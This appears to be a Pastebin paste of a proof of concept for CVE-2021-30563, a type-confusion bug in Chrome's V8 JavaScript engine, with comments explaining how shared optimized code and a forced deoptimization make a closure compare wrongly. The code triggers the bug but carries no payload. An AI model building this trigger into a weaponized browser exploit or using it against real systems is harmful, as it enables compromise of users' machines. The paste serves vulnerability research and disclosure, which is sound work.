Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // PoC CVE-2021-30563 - Type Confusion in V8
- // https://twitter.com/Zeusb0x
- // r --allow-natives-syntax
- function make() {
- const foo = function(x) {
- var ab = [shClosure];
- if (x > 10) {
- temp[0] = 1;
- }
- return ab[0] === shClosure;
- };
- return foo;
- }
- // Build the first closure, with function context specialization
- make();
- // Build and optimize a second closure.
- shClosure = make();
- temp = [1];
- // Don't provide feedback for the greater than branch
- %PrepareFunctionForOptimization(shClosure);
- shClosure(1);
- %OptimizeFunctionOnNextCall(shClosure);
- shClosure(2);
- // Build a third closure. This will share the code object with the second closure.
- fkClosure = make();
- // Return value is evaluated to a constant true;
- print(fkClosure(1));
- // Force deopt.
- // In the process of translating the native frame to an interpreted one, the JSFunction stack slot is used to represent the closure in question (as part of a captured object).
- // Because the code object is shared ab[0] will evaluate to fkClosure instead of shClosure in the following call.
- print(fkClosure(11)); // false
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement